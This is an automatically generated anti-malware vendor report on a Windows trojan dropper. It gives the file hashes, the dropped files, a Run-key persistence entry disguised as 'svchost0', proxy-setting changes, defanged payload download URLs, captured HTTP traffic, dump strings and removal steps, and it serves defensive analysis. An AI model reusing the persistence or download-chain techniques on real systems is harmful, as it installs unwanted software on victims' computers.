Trojan.GenericKD.4597039_c59ec9aa29

by malwarelabrobot on April 2nd, 2017 in Malware Descriptions.

Trojan-Dropper.Win32.Sysn.ceic (Kaspersky), Trojan.GenericKD.4597039 (B) (Emsisoft), Trojan.GenericKD.4597039 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c59ec9aa2900d0444e445184b567cb8f
SHA1: daa38b395d3ffd0d24e47725773033d363e0e55e
SHA256: 61bec80b6be6183c4cfc4b06e047d68452ac775f9a103bb3d0d1d83aadaa4fa5
SSDeep: 12288:7XwOrReFWQF96hGcWn7GJeKYxh/DNlmWwnTKXVh2OAM1Vs6:7XwOrRsRMHWnSJ2xVCKVhomVH
Size: 471563 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Heaventools Software
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup.exe:1900
uc.exe:1780
Bind.exe:2980
%original file name%.exe:1904
setup.tmp:2504

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (0 bytes)

The process Bind.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (322475 bytes)

The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1234 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)

The process setup.tmp:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\is-EMLCE.tmp (23961 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HV063.tmp (336232 bytes)
%Program Files%\fff\fff.ini (25 bytes)
%Program Files%\fff\uc.exe (20845 bytes)
%Program Files%\fff\is-27FEK.tmp (601 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp (0 bytes)

Registry activity

The process uc.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"

The process Bind.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process setup.tmp:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "52 57 97 14 28 CC 09 85 30 BF CB 12 66 D8 49 C0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "84 1E 35 B4 A2 6E D8 7B E4 2D FA 28 86 63 D2 BF"
"Owner" = "C8 09 00 00 4F 2D BE 0A 98 AA D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

Dropped PE files

MD5 File path
9ae609779122802b06182903baec93ea c:\Program Files\fff\Bind.exe
c96a0f939b9e809d24d6149046b7eb72 c:\Program Files\fff\uc.exe
f13f028e99888a77e21c721961101339 c:\Program Files\fff\unins000.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 101854 101888 4.62608 0c04e49d78a3c453186c916e6f29540d
.rdata 106496 15306 15360 3.96022 1eff757b36a6b7a599236ac8b1b35b4d
.data 122880 19948 2560 3.08518 21d5c7a8ba54658b1e07909bf1045c79
.rsrc 143360 6124 6144 2.447 653c7269f74cc4a55256fa4ce18159c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 4
712fe060095354d46e56453a9e89361a
f7ee0c604322fd2ecde860d9e255e401
018dc6096ab70a223715be23a7529094
b74229149dee4708eeb55641b246cf2c

URLs

URL IP
hxxp://www.guoneizhu.com/ucni.txt
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe
dns.msftncsi.com
time.windows.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Sat, 01 Apr 2017 03:28:34 GMT
Content-Length: 51179792
MZ......................@...................................H.........
..!..L.!This program cannot be run in DOS mode....$.......]....o...o..
.o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....
X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..
o...o;..o...4...o..Rich.o..........................PE..L...Y..X.......
.............................. ....@..........................P.......
...................................Y.......T......................../.
......n..@...T...............................@........................
....................text...I........................... ..`.data...<
;e... ......................@....idata...,...........&..............@.
.@.gfids..(............T..............@..@.tls.................X......
........@....rsrc................Z..............@..@.reloc...n.......p
...R..............@..B................................................
......................................................................
....................................................A.......J...A...A.
..A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.
A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.
................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.
7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.
5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.
5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.
D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.
<<< skipped >>>


GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 31 Mar 2017 10:20:22 GMT
Accept-Ranges: bytes
ETag: "eb6c7678aad21:0"
Server: Microsoft-IIS/10.0
Date: Sat, 01 Apr 2017 03:28:12 GMT
Content-Length: 318
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518
).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.g
uoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe
..hXXp://VVV.guoneizhu.com/sogou_explorer_fast_7.0.6.23853_7471.exe so
gou_explorer_fast_7.0.6.23853_7471.exe..

The Trojan connects to the servers at the folowing location(s):

uc.exe_1780:

.text
`.rdata
@.data
.rsrc
w.SCv
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\%s
%s\*.*
@.reloc
GetProcessWindowStation
"%/28;=#$019:>?
mgM
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1 1@1`1|1
8 8$80848
%Program Files%\fff\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
\aa.lnk
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
Chrome_WidgetWin_1
C:\Users\Public\Desktop\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
qqbrowser.exe
http\shell\open\command
%s\Internet Explorer\iexplore.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
1, 0, 0, 1
uc.exe

Bind.exe_2980:

.text
`.rdata
@.data
.rsrc
xDv.SCv
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
HttpQueryInfoA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\fff\Bind.exe
Bind.exe
msctls_hotkey32
HotKey1


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setup.exe:1900
    uc.exe:1780
    Bind.exe:2980
    %original file name%.exe:1904
    setup.tmp:2504

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (1423 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (322475 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1234 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (47 bytes)
    %Program Files%\fff\is-EMLCE.tmp (23961 bytes)
    %Program Files%\fff\unins000.dat (1376 bytes)
    %Program Files%\fff\Bind.exe (73 bytes)
    %Program Files%\fff\is-HV063.tmp (336232 bytes)
    %Program Files%\fff\fff.ini (25 bytes)
    %Program Files%\fff\uc.exe (20845 bytes)
    %Program Files%\fff\is-27FEK.tmp (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost0" = "%Program Files%\fff\uc.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now